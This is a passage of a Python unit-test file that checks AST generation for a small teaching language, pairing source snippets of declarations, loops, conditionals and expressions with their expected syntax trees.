Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,325))\n\n\tdef test_378(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, bn\nBody:\nReturn a + bn - a[foo()];\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('bn'),[],None)],([],[Return(BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('bn')),ArrayCell(Id('a'),[CallExpr(Id('foo'),[])])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,378))\n\n\tdef test_315(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = a <b - c;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),BinaryOp(\"\"\"-\"\"\",Id('b'),Id('c'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,315))\n\n\tdef test_375(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. (a-a-.a*a*.a\\.b%!c&&a||a==b);\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('b'),ArrayLiteral([ArrayLiteral([ArrayLiteral([])])])),Assign(Id('a'),BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",Id('a'),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,375))\n\n\tdef test_400(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nFor(i=expr, a =/= {{}}, \"what is that'\"\" + 1) Do\nBreak;Continue;\nEndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[For(Id('i'),Id('expr'),BinaryOp(\"\"\"=/=\"\"\",Id('a'),ArrayLiteral([ArrayLiteral([])])),BinaryOp(\"\"\"+\"\"\",StringLiteral(\"\"\"what is that'\\\"\"\"\"),IntLiteral(1)),([],[Break(),Continue()]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,400))\n\n\tdef test_388(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nWhile statement Do something(); EndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[While(Id('statement'),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,388))\n\n\tdef test_379(self):\n\t\tinput = \"\"\"Function: main\nParameter: a\nBody:\na[1] = b[1] + {1,2,3} + append();\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(Id('a'),[IntLiteral(1)]),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[IntLiteral(1)]),ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)])),CallExpr(Id('append'),[])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,379))\n\n\tdef test_373(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = a + b +. a-a-.a*a*.a\\.b%!c&&a||a==b;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('a')),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b')))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,373))\n\n\tdef test_327(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)])),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,327))\n\n\tdef test_398(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}}, \"what is that\" + 1) Do\n EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[For(Id('i'),Id('expr'),BinaryOp(\"\"\"=/=\"\"\",Id('a'),ArrayLiteral([ArrayLiteral([])])),BinaryOp(\"\"\"+\"\"\",StringLiteral(\"\"\"what is that\"\"\"),IntLiteral(1)),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,398))\n\n\tdef test_332(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n (1 + c)[foo() + 1][1 + 2][a + v] = a;\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('c')),[BinaryOp(\"\"\"+\"\"\",CallExpr(Id('foo'),[]),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('v'))]),Id('a'))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,332))\n\n\tdef test_308(self):\n\t\tinput = \"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\nFunction: fact\nParameter: n\nBody:\nIf n == 0 Then\nReturn 1;\nElse\nReturn n * fact(n-1);\nEndIf.\nEndBody.\nFunction: main\n** this is a comment **\nBody:\nx = 10;\nfact (x);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None),VarDecl(Id('y'),[1,3],ArrayLiteral([ArrayLiteral([ArrayLiteral([IntLiteral(12),IntLiteral(1)]),ArrayLiteral([FloatLiteral(12.0),FloatLiteral(12000.0)])]),ArrayLiteral([IntLiteral(23)]),ArrayLiteral([IntLiteral(13),IntLiteral(32)])])),FuncDecl(Id('fact'),[VarDecl(Id('n'),[],None)],([],[If([(BinaryOp(\"\"\"==\"\"\",Id('n'),IntLiteral(0)),[],[Return(IntLiteral(1))])],([],[Return(BinaryOp(\"\"\"*\"\"\",Id('n'),CallExpr(Id('fact'),[BinaryOp(\"\"\"-\"\"\",Id('n'),IntLiteral(1))])))]))])),FuncDecl(Id('main'),[],([],[Assign(Id('x'),IntLiteral(10)),CallStmt(Id('fact'),[Id('x')])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,308))\n\n\tdef test_347(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While 1 <. 2.0 EndDo.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"<.\"\"\",IntLiteral(1),FloatLiteral(2.0)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,347))\n\n\tdef test_377(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\n\nEndBody.\nFunction: foo\nBody:\nmain();\nIf a[1] Then foo(); EndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[])),FuncDecl(Id('foo'),[],([],[CallStmt(Id('main'),[]),If([(ArrayCell(Id('a'),[IntLiteral(1)]),[],[CallStmt(Id('foo'),[])])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,377))\n\n\tdef test_349(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a && b <. 1. +. 3. EndDo.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"<.\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(1.0),FloatLiteral(3.0))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,349))\n\n\tdef test_367(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(a < b + c);\nprintLn();\na = 1+ 2+2+{1, 2,3};\n**print(arg);\nprintStrLn(arg)**\nread();\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[BinaryOp(\"\"\"<\"\"\",Id('a'),BinaryOp(\"\"\"+\"\"\",Id('b'),Id('c')))]),CallStmt(Id('printLn'),[]),Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2)),IntLiteral(2)),ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)]))),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,367))\n\n\tdef test_401(self):\n\t\tinput = \"\"\"Function: main\nBody:\nFor (i = 0x12, a < 2, i + foo((foo()[1 + a[1 + 2]])) + 1) Do something(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[],([],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[ArrayCell(CallExpr(Id('foo'),[]),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),ArrayCell(Id('a'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2))]))])])),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,401))\n\n\tdef test_319(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1]\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,319))\n\n\tdef test_337(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nFor (i = 2, a < 2, i + 1) Do \nFor (i=2, a>1341,a+b) Do EndFor.\nsomething(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(2),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('i'),IntLiteral(1)),([],[For(Id('i'),IntLiteral(2),BinaryOp(\"\"\">\"\"\",Id('a'),IntLiteral(1341)),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),([],[])),CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,337))\n\n\tdef test_324(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, b[1]\nBody:\nVar: x=1,a[1]=1;\nIf a Then\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1))],[If([(Id('a'),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,324))\n\n\tdef test_356(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return a < 1 || foo(arg1, \"arg2\", {1,2});\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"<\"\"\",Id('a'),BinaryOp(\"\"\"||\"\"\",IntLiteral(1),CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"arg2\"\"\"),ArrayLiteral([IntLiteral(1),IntLiteral(2)])]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,356))\n\n\tdef test_306(self):\n\t\tinput = \"\"\"Var: b[2][3]={{1,2},{3,4}};\nFunction: main\nBody:\nReturn;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('b'),[2,3],ArrayLiteral([ArrayLiteral([IntLiteral(1),IntLiteral(2)]),ArrayLiteral([IntLiteral(3),IntLiteral(4)])])),FuncDecl(Id('main'),[],([],[Return(None)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,306))\n\n\tdef test_362(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing))[1] = something(foo());\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(ArrayCell(CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])]),[IntLiteral(1)]),CallExpr(Id('something'),[CallExpr(Id('foo'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,362))\n\n\tdef test_380(self):\n\t\tinput = \"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])])],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))]))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,380))\n\n\tdef test_370(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]),BinaryOp(\"\"\"*.\"\"\",Id('c'),ArrayCell(Id('d'),[IntLiteral(1),IntLiteral(21)]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,370))\n\n\tdef test_392(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a[3 + foo(2)] = a[b[2][3]] \\. -.4;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(Id('a'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(3),CallExpr(Id('foo'),[IntLiteral(2)]))]),BinaryOp(\"\"\"\\.\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('b'),[IntLiteral(2),IntLiteral(3)])]),UnaryOp(\"\"\"-.\"\"\",IntLiteral(4))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,392))\n\n\tdef test_354(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + {{1,2}, \"abnd\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),ArrayLiteral([ArrayLiteral([IntLiteral(1),IntLiteral(2)]),StringLiteral(\"\"\"abnd\"\"\")])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,354))\n\n\tdef test_340(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While 1 Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(IntLiteral(1),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,340))\n\n\tdef test_350(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nIf !(True) Then\na = a <c;\nIf (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12 + e; EndIf.\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",IntLiteral(12),Id('e')))]))])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,350))\n\n\tdef test_353(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + 1;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,353))\n\n\tdef test_341(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x =/= y) Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"=/=\"\"\",Id('x'),Id('y'))),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,341))\n\n\tdef test_320(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, b[1]\nBody:\nVar: x=1,a[1]={{}};\nVar: a,b[1]={\"this\"};\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([ArrayLiteral([])])),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,320))\n\n\tdef test_343(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) && (a || abc) Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(BinaryOp(\"\"\"&&\"\"\",UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('x'),Id('y')),Id('b'))),BinaryOp(\"\"\"||\"\"\",Id('a'),Id('abc'))),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,343))\n\n\tdef test_329(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('a')),BinaryOp(\"\"\"*\"\"\",Id('b'),CallExpr(Id('foo'),[]))),IntLiteral(1)),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,329))\n\n\tdef test_365(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\nprintLn();\nprint(arg);\nprintStrLn(arg);\nread();\nEndBody.\"\"\"\n\t\texpect = 